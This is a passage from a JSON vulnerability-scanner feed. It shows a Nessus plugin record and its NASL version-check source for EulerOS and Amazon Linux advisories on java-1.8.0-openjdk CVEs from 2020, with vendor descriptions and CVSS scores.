product\n of Oracle Java SE (component: Libraries). 
Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible data. Note:\n Applies to client and server deployment of Java. This\n vulnerability can be exploited through sandboxed Java\n Web Start applications and sandboxed Java applets. It\n can also be exploited by supplying data to APIs in the\n specified Component without using sandboxed Java Web\n Start applications or sandboxed Java applets, such as\n through a web service.(CVE-2020-14782)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data.\n Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start\n applications or sandboxed Java applets, that load and\n run untrusted code (e.g., code that comes from the\n internet) and rely on the Java sandbox for security.\n This vulnerability does not apply to Java deployments,\n typically in servers, that load and run only trusted\n code (e.g., code installed by an\n administrator).(CVE-2020-14796)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). 
Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible data. Note:\n Applies to client and server deployment of Java. This\n vulnerability can be exploited through sandboxed Java\n Web Start applications and sandboxed Java applets. It\n can also be exploited by supplying data to APIs in the\n specified Component without using sandboxed Java Web\n Start applications or sandboxed Java applets, such as\n through a web service.(CVE-2020-14797)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Libraries). Supported versions that are\n affected are Java SE: 11.0.8 and 15. Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java\n SE accessible data. Note: This vulnerability applies to\n Java deployments, typically in clients running\n sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code\n that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability does not apply\n to Java deployments, typically in servers, that load\n and run only trusted code (e.g., code installed by an\n administrator).(CVE-2020-14803)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). Supported\n versions that are affected are Java SE: 8u241, 11.0.6\n and 14 Java SE Embedded: 8u241. 
Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2754)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). Supported\n versions that are affected are Java SE: 8u241, 11.0.6\n and 14 Java SE Embedded: 8u241. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2755)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2756)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. 
Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2757)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Security). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2773)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JSSE). Supported versions\n that are affected are Java SE: 7u251, 8u241, 11.0.6 and\n 14 Java SE Embedded: 8u241. Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via HTTPS to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Lightweight HTTP Server).\n Supported versions that are affected are Java SE:\n 7u251, 8u241, 11.0.6 and 14 Java SE Embedded: 8u241.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. 
Successful attacks of this vulnerability can\n result in unauthorized update, insert or delete access\n to some of Java SE, Java SE Embedded accessible data as\n well as unauthorized read access to a subset of Java\n SE, Java SE Embedded accessible data.(CVE-2020-2800)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Concurrency). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Easily\n exploitable vulnerability allows unauthenticated\n attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2830)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: 2D). Supported versions\n that are affected are Java SE: 8u251, 11.0.7 and 14.0.1\n Java SE Embedded: 8u251. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14581)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 2, "cvss3": {"score": 4.8, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"}, "published": "2021-01-20T00:00:00", "title": "EulerOS 2.0 SP3 : java-1.8.0-openjdk (EulerOS-SA-2021-1078)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-2830", "CVE-2020-14803", "CVE-2020-14782", "CVE-2020-2781", "CVE-2020-2755", "CVE-2020-2800", "CVE-2020-2757", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14798", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-2773", "CVE-2020-14796", "CVE-2020-2756", "CVE-2020-14581", "CVE-2020-2754"], "modified": "2021-01-20T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:java-1.8.0-openjdk", "p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-headless", "p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-devel", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-1078.NASL", "href": "https://www.tenable.com/plugins/nessus/145111", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145111);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/22\");\n\n script_cve_id(\n \"CVE-2020-14581\",\n \"CVE-2020-14779\",\n \"CVE-2020-14781\",\n \"CVE-2020-14782\",\n \"CVE-2020-14792\",\n \"CVE-2020-14796\",\n \"CVE-2020-14797\",\n \"CVE-2020-14798\",\n \"CVE-2020-14803\",\n \"CVE-2020-2754\",\n \"CVE-2020-2755\",\n \"CVE-2020-2756\",\n \"CVE-2020-2757\",\n \"CVE-2020-2773\",\n \"CVE-2020-2781\",\n \"CVE-2020-2800\",\n \"CVE-2020-2830\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : java-1.8.0-openjdk (EulerOS-SA-2021-1078)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the java-1.8.0-openjdk packages\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE Embedded.\n Note: Applies to client and server deployment of Java.\n This vulnerability can be exploited through sandboxed\n Java Web Start applications and sandboxed Java applets.\n It can also be exploited by supplying data to APIs in\n the specified Component without using sandboxed Java\n Web Start applications or sandboxed Java applets, such\n as through a web service.(CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JNDI). Supported versions\n that are affected are Java SE: 7u271, 8u261, 11.0.8 and\n 15 Java SE Embedded: 8u261. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. 
Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data.\n Note: Applies to client and server deployment of Java.\n This vulnerability can be exploited through sandboxed\n Java Web Start applications and sandboxed Java applets.\n It can also be exploited by supplying data to APIs in\n the specified Component without using sandboxed Java\n Web Start applications or sandboxed Java applets, such\n as through a web service.(CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Hotspot). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data.\n Note: Applies to client and server deployment of Java.\n This vulnerability can be exploited through sandboxed\n Java Web Start applications and sandboxed Java applets.\n It can also be exploited by supplying data to APIs in\n the specified Component without using sandboxed Java\n Web Start applications or sandboxed Java applets, such\n as through a web service.(CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. 
Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data. Note: This vulnerability applies to\n Java deployments, typically in clients running\n sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code\n that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability does not apply\n to Java deployments, typically in servers, that load\n and run only trusted code (e.g., code installed by an\n administrator).(CVE-2020-14798)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible data. Note:\n Applies to client and server deployment of Java. This\n vulnerability can be exploited through sandboxed Java\n Web Start applications and sandboxed Java applets. It\n can also be exploited by supplying data to APIs in the\n specified Component without using sandboxed Java Web\n Start applications or sandboxed Java applets, such as\n through a web service.(CVE-2020-14782)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. 
Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data.\n Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start\n applications or sandboxed Java applets, that load and\n run untrusted code (e.g., code that comes from the\n internet) and rely on the Java sandbox for security.\n This vulnerability does not apply to Java deployments,\n typically in servers, that load and run only trusted\n code (e.g., code installed by an\n administrator).(CVE-2020-14796)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized update, insert or delete access to some of\n Java SE, Java SE Embedded accessible data. Note:\n Applies to client and server deployment of Java. This\n vulnerability can be exploited through sandboxed Java\n Web Start applications and sandboxed Java applets. It\n can also be exploited by supplying data to APIs in the\n specified Component without using sandboxed Java Web\n Start applications or sandboxed Java applets, such as\n through a web service.(CVE-2020-14797)\n\n - Vulnerability in the Java SE product of Oracle Java SE\n (component: Libraries). Supported versions that are\n affected are Java SE: 11.0.8 and 15. Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE. 
Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java\n SE accessible data. Note: This vulnerability applies to\n Java deployments, typically in clients running\n sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code\n that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability does not apply\n to Java deployments, typically in servers, that load\n and run only trusted code (e.g., code installed by an\n administrator).(CVE-2020-14803)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). Supported\n versions that are affected are Java SE: 8u241, 11.0.6\n and 14 Java SE Embedded: 8u241. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2754)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Scripting). Supported\n versions that are affected are Java SE: 8u241, 11.0.6\n and 14 Java SE Embedded: 8u241. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Java\n SE, Java SE Embedded.(CVE-2020-2755)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. 
Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2756)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2757)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Security). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2773)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JSSE). Supported versions\n that are affected are Java SE: 7u251, 8u241, 11.0.6 and\n 14 Java SE Embedded: 8u241. Easily exploitable\n vulnerability allows unauthenticated attacker with\n network access via HTTPS to compromise Java SE, Java SE\n Embedded. 
Successful attacks of this vulnerability can\n result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Lightweight HTTP Server).\n Supported versions that are affected are Java SE:\n 7u251, 8u241, 11.0.6 and 14 Java SE Embedded: 8u241.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via\n multiple protocols to compromise Java SE, Java SE\n Embedded. Successful attacks of this vulnerability can\n result in unauthorized update, insert or delete access\n to some of Java SE, Java SE Embedded accessible data as\n well as unauthorized read access to a subset of Java\n SE, Java SE Embedded accessible data.(CVE-2020-2800)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Concurrency). Supported\n versions that are affected are Java SE: 7u251, 8u241,\n 11.0.6 and 14 Java SE Embedded: 8u241. Easily\n exploitable vulnerability allows unauthenticated\n attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE\n Embedded.(CVE-2020-2830)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: 2D). Supported versions\n that are affected are Java SE: 8u251, 11.0.7 and 14.0.1\n Java SE Embedded: 8u251. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. 
Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible\n data.(CVE-2020-14581)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1078\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cc613330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected java-1.8.0-openjdk packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:java-1.8.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:java-1.8.0-openjdk-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is 
owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"java-1.8.0-openjdk-1.8.0.191.b12-0.h13\",\n \"java-1.8.0-openjdk-devel-1.8.0.191.b12-0.h13\",\n \"java-1.8.0-openjdk-headless-1.8.0.191.b12-0.h13\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.8.0-openjdk\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, 
{"lastseen": "2021-01-17T09:21:33", "description": "The version of java-1.8.0-openjdk installed on the remote host is prior to 1.8.0.272.b10-1.56. It is, therefore,\naffected by multiple vulnerabilities as referenced in the ALAS-2021-1460 advisory.\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization).\n Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261.\n Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple\n protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded.\n Note: Applies to client and server deployment of Java. This vulnerability can be exploited through\n sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying\n data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed\n Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). (CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized\n read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server\n deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and\n sandboxed Java applets. 
It can also be exploited by supplying data to APIs in the specified Component\n without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web\n service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). (CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized\n update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to\n client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start\n applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the\n specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as\n through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). (CVE-2020-14782, CVE-2020-14797)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other\n than the attacker. 
Successful attacks of this vulnerability can result in unauthorized update, insert or\n delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of\n Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java\n applets. It can also be exploited by supplying data to APIs in the specified Component without using\n sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1\n Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N). (CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other\n than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a\n subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for\n security. This vulnerability does not apply to Java deployments, typically in servers, that load and run\n only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality\n impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). (CVE-2020-14796)\n\n - Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). 
Supported versions that are\n affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can\n result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability\n applies to Java deployments, typically in clients running sandboxed Java Web Start applications or\n sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and\n rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in\n servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base\n Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).\n (CVE-2020-14803)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 1, "cvss3": {"score": 4.2, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N"}, "published": "2021-01-14T00:00:00", "title": "Amazon Linux AMI : java-1.8.0-openjdk (ALAS-2021-1460)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:java-1.8.0-openjdk-headless", 